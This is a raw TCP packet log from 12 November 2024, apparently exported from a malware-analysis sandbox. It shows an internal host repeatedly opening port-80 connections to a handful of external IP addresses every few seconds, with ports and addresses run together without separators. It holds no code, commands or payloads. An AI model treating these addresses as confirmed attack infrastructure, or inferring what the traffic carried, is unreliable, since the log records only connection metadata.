                                                                          Nov 12, 2024 08:52:31.681183100 CET8049740217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:52:32.486896038 CET8049740217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:52:32.486912966 CET8049740217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:52:32.486921072 CET8049740217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:52:32.487227917 CET4974080192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:52:32.597651005 CET8049740217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:52:32.597846031 CET4974080192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:52:32.601336002 CET4974080192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:52:32.606988907 CET8049740217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:52:37.858609915 CET4974280192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:37.863435984 CET8049742199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:37.863527060 CET4974280192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:37.872726917 CET4974280192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:37.877557039 CET8049742199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:38.480180979 CET8049742199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:38.480201006 CET8049742199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:38.480268955 CET4974280192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:38.480402946 CET8049742199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:38.480452061 CET4974280192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:39.380508900 CET4974280192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:40.399338961 CET4974980192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:40.404285908 CET8049749199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:40.404387951 CET4974980192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:40.414700985 CET4974980192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:40.419558048 CET8049749199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:41.028640985 CET8049749199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:41.028656006 CET8049749199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:41.028718948 CET4974980192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:41.029556990 CET8049749199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:41.029603958 CET4974980192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:41.927387953 CET4974980192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:42.953668118 CET4976580192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:42.958678007 CET8049765199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:42.958988905 CET4976580192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:42.970439911 CET4976580192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:42.975472927 CET8049765199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:42.975513935 CET8049765199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:42.976855993 CET8049765199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:42.976923943 CET8049765199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:42.977052927 CET8049765199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:42.977061987 CET8049765199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:42.977569103 CET8049765199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:42.977621078 CET8049765199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:42.977629900 CET8049765199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:43.575428963 CET8049765199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:43.575443983 CET8049765199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:43.575517893 CET4976580192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:43.576086998 CET8049765199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:43.576142073 CET4976580192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:44.474245071 CET4976580192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:45.493109941 CET4978080192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:45.497956038 CET8049780199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:45.498121023 CET4978080192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:45.504862070 CET4978080192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:45.509721041 CET8049780199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:47.113971949 CET8049780199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:47.113987923 CET8049780199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:47.114268064 CET4978080192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:47.114366055 CET8049780199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:47.114411116 CET4978080192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:47.117191076 CET4978080192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:47.122093916 CET8049780199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:52.579720974 CET4982180192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:52.584537029 CET8049821199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:52.584615946 CET4982180192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:52.594949961 CET4982180192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:52.599792004 CET8049821199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:53.222028017 CET8049821199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:53.222039938 CET8049821199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:53.222090006 CET4982180192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:53.222609043 CET8049821199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:53.222647905 CET4982180192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:54.099932909 CET4982180192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:55.117440939 CET4983780192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:55.122303009 CET8049837199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:55.122365952 CET4983780192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:55.131661892 CET4983780192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:55.136595011 CET8049837199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:55.756385088 CET8049837199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:55.756422997 CET8049837199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:55.756469965 CET4983780192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:55.758161068 CET8049837199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:55.758209944 CET4983780192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:56.646122932 CET4983780192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:57.664503098 CET4985280192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:57.669431925 CET8049852199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:57.669507980 CET4985280192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:57.679811954 CET4985280192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:57.684860945 CET8049852199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:57.684905052 CET8049852199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:57.684958935 CET8049852199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:57.684968948 CET8049852199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:57.685012102 CET8049852199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:57.685053110 CET8049852199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:57.685091019 CET8049852199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:57.685100079 CET8049852199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:57.685142040 CET8049852199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:58.297275066 CET8049852199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:58.297287941 CET8049852199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:58.297328949 CET4985280192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:58.297768116 CET8049852199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:52:58.297811985 CET4985280192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:52:59.194267035 CET4985280192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:53:00.211694002 CET4986880192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:53:00.216674089 CET8049868199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:53:00.216748953 CET4986880192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:53:00.223387957 CET4986880192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:53:00.228266954 CET8049868199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:53:00.876884937 CET8049868199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:53:00.876898050 CET8049868199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:53:00.877037048 CET4986880192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:53:00.877362013 CET8049868199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:53:00.878160954 CET4986880192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:53:00.879267931 CET4986880192.168.2.4199.59.243.227
                                                                          Nov 12, 2024 08:53:00.884229898 CET8049868199.59.243.227192.168.2.4
                                                                          Nov 12, 2024 08:53:05.904844046 CET4989780192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:05.909682035 CET8049897209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:05.909739971 CET4989780192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:05.922686100 CET4989780192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:05.927512884 CET8049897209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:06.577081919 CET8049897209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:06.615195990 CET8049897209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:06.615258932 CET4989780192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:07.427459002 CET4989780192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:08.446697950 CET4991280192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:08.451499939 CET8049912209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:08.451663017 CET4991280192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:08.462522030 CET4991280192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:08.467303991 CET8049912209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:09.133166075 CET8049912209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:09.164997101 CET8049912209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:09.165052891 CET4991280192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:09.974369049 CET4991280192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:10.993257046 CET4992780192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:10.998346090 CET8049927209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:10.998473883 CET4992780192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:11.014210939 CET4992780192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:11.019260883 CET8049927209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:11.019279957 CET8049927209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:11.019332886 CET8049927209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:11.019391060 CET8049927209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:11.019479990 CET8049927209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:11.019490004 CET8049927209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:11.019506931 CET8049927209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:11.019515991 CET8049927209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:11.019525051 CET8049927209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:11.954678059 CET8049927209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:11.993412971 CET8049927209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:11.993479013 CET4992780192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:12.522173882 CET4992780192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:13.539248943 CET4994380192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:13.544056892 CET8049943209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:13.544150114 CET4994380192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:13.557502031 CET4994380192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:13.562434912 CET8049943209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:14.226073980 CET8049943209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:14.264205933 CET8049943209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:14.266252995 CET4994380192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:14.270173073 CET4994380192.168.2.4209.74.64.58
                                                                          Nov 12, 2024 08:53:14.274995089 CET8049943209.74.64.58192.168.2.4
                                                                          Nov 12, 2024 08:53:19.591972113 CET4997980192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:19.596807003 CET804997947.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:19.596873045 CET4997980192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:19.608899117 CET4997980192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:19.614299059 CET804997947.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:20.562227964 CET804997947.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:20.646119118 CET4997980192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:20.748174906 CET804997947.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:20.748250008 CET4997980192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:21.116228104 CET4997980192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:22.138801098 CET4999480192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:22.143713951 CET804999447.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:22.143779039 CET4999480192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:22.155636072 CET4999480192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:22.160412073 CET804999447.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:23.126152992 CET804999447.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:23.223177910 CET4999480192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:23.318299055 CET804999447.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:23.318367958 CET4999480192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:23.661900997 CET4999480192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:24.680461884 CET5001080192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:24.685343981 CET805001047.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:24.685458899 CET5001080192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:24.696234941 CET5001080192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:24.701077938 CET805001047.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:24.701137066 CET805001047.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:24.701152086 CET805001047.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:24.701226950 CET805001047.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:24.701236010 CET805001047.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:24.701298952 CET805001047.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:24.701308012 CET805001047.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:24.701348066 CET805001047.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:24.701355934 CET805001047.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:25.927558899 CET805001047.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:25.927898884 CET805001047.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:25.927918911 CET805001047.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:25.927948952 CET5001080192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:25.927973986 CET5001080192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:26.208667994 CET5001080192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:27.227737904 CET5002380192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:27.232526064 CET805002347.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:27.232587099 CET5002380192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:27.242064953 CET5002380192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:27.246813059 CET805002347.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:28.208312035 CET805002347.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:28.258203983 CET5002380192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:28.394979000 CET805002347.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:28.402257919 CET5002380192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:28.403951883 CET5002380192.168.2.447.242.89.146
                                                                          Nov 12, 2024 08:53:28.408776045 CET805002347.242.89.146192.168.2.4
                                                                          Nov 12, 2024 08:53:33.489301920 CET5002480192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:33.494277954 CET8050024128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:33.494357109 CET5002480192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:33.626616955 CET5002480192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:33.631534100 CET8050024128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:35.146220922 CET5002480192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:35.149131060 CET8050024128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:35.149388075 CET5002480192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:35.151366949 CET8050024128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:35.151520014 CET5002480192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:36.167190075 CET5002580192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:36.172112942 CET8050025128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:36.172180891 CET5002580192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:36.188538074 CET5002580192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:36.193362951 CET8050025128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:37.693162918 CET5002580192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:37.698482990 CET8050025128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:37.698540926 CET5002580192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:38.712667942 CET5002680192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:38.718008995 CET8050026128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:38.718154907 CET5002680192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:38.728894949 CET5002680192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:38.733788013 CET8050026128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:38.733798027 CET8050026128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:38.733813047 CET8050026128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:38.733822107 CET8050026128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:38.733830929 CET8050026128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:38.733985901 CET8050026128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:38.733994961 CET8050026128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:38.734026909 CET8050026128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:38.734035969 CET8050026128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:40.240238905 CET5002680192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:40.408983946 CET8050026128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:40.409074068 CET5002680192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:41.260360956 CET5002780192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:41.617634058 CET8050027128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:41.617727041 CET5002780192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:41.626652002 CET5002780192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:41.631488085 CET8050027128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:43.107496977 CET8050027128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:43.161801100 CET5002780192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:43.199642897 CET8050027128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:43.202372074 CET5002780192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:43.206227064 CET5002780192.168.2.4128.65.195.180
                                                                          Nov 12, 2024 08:53:43.211013079 CET8050027128.65.195.180192.168.2.4
                                                                          Nov 12, 2024 08:53:48.308267117 CET5002880192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:48.313476086 CET8050028217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:48.313656092 CET5002880192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:48.325061083 CET5002880192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:48.329874992 CET8050028217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:49.123608112 CET8050028217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:49.193082094 CET5002880192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:49.231482029 CET8050028217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:49.231530905 CET5002880192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:49.833853006 CET5002880192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:50.852653027 CET5002980192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:50.858489990 CET8050029217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:50.858589888 CET5002980192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:50.869549036 CET5002980192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:50.875266075 CET8050029217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:51.670789003 CET8050029217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:51.724320889 CET5002980192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:51.779285908 CET8050029217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:51.779337883 CET5002980192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:52.381350040 CET5002980192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:53.401110888 CET5003080192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:53.406008005 CET8050030217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:53.406096935 CET5003080192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:53.420595884 CET5003080192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:53.425472021 CET8050030217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:53.425520897 CET8050030217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:53.425585985 CET8050030217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:53.425595045 CET8050030217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:53.425616980 CET8050030217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:53.425656080 CET8050030217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:53.425697088 CET8050030217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:53.425714016 CET8050030217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:53.425724030 CET8050030217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:54.882843971 CET8050030217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:54.882879972 CET8050030217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:54.882889032 CET8050030217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:54.882913113 CET8050030217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:54.882996082 CET5003080192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:54.882996082 CET5003080192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:54.928291082 CET5003080192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:55.095855951 CET8050030217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:55.096052885 CET5003080192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:55.946731091 CET5003180192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:55.951740980 CET8050031217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:55.951808929 CET5003180192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:55.962591887 CET5003180192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:55.967442989 CET8050031217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:56.780817032 CET8050031217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:56.780832052 CET8050031217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:56.780843973 CET8050031217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:56.781019926 CET5003180192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:56.893059969 CET8050031217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:53:56.896266937 CET5003180192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:56.896347046 CET5003180192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:56.900266886 CET5003180192.168.2.4217.70.184.50
                                                                          Nov 12, 2024 08:53:56.905066967 CET8050031217.70.184.50192.168.2.4
                                                                          Nov 12, 2024 08:54:01.931433916 CET5003280192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:01.936350107 CET80500323.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:01.936431885 CET5003280192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:01.946830034 CET5003280192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:01.951710939 CET80500323.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:02.593440056 CET80500323.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:02.593529940 CET5003280192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:03.460701942 CET5003280192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:03.465625048 CET80500323.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:04.480288982 CET5003380192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:04.485233068 CET80500333.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:04.485358000 CET5003380192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:04.500427961 CET5003380192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:04.505383015 CET80500333.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:06.005780935 CET5003380192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:06.011318922 CET80500333.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:06.011373997 CET5003380192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:07.026285887 CET5003480192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:07.031218052 CET80500343.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:07.034388065 CET5003480192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:07.046180010 CET5003480192.168.2.43.33.130.190
                                                                          Nov 12, 2024 08:54:07.051016092 CET80500343.33.130.190192.168.2.4
                                                                          Nov 12, 2024 08:54:07.051057100 CET80500343.33.130.190192.168.2.4
